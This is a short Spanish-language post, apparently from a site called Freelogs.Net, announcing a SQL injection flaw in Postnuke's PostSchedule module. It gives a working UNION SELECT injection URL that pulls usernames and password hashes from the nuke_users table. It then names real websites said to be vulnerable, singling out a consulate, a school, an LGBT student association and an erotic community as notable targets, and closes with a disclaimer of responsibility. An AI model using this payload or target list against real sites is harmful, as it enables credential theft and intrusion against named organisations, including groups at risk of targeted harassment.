Ha aparecido una vulnerabilidad de tipo SQL Injection en Postnuke.

 

Inyección de código:

 

index.php?module=PostSchedule&view=event&eid=-

 

 1′)+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/

 

 from/**/nuke_users/**/where/**/pn_uid=2/*

 

 

El autor de dicho descubrimiento es Vuln search Kacper (kacper1964_at_yahoo.pl) de http://devilteam.pl

 

Algunas páginas encontradas por Freelogs.Net vulnerables al ataque son:

 

http://www.exactas.org

http://www.trabajosocial.unam.mx

http://www.amigosdelaire.com

http://www.dentistasrioja.com

http://www.adolince.net

http://www.sirzee.itcr.ac.cr

http://www.azimutclm.com

 

Entre las webs más interesantes destacar:

 

http://www.consuladouy-bcn.org ( Consulado de Uruguay en Barcelona)

http://www.lasalle.es ( Mi Ex colegio xD )

http://www.sinver.org ( Asociación universitaria de GAYS y LESBIANAS DE Barcelona)

http://www.sexosintabues.com ( Comunidad Erótica de España)

 

Freelogs.NET no ha perpetrado ningún ataque, son datos informativos, no nos hacemos responsables del  uso que se le pueda dar a esta información.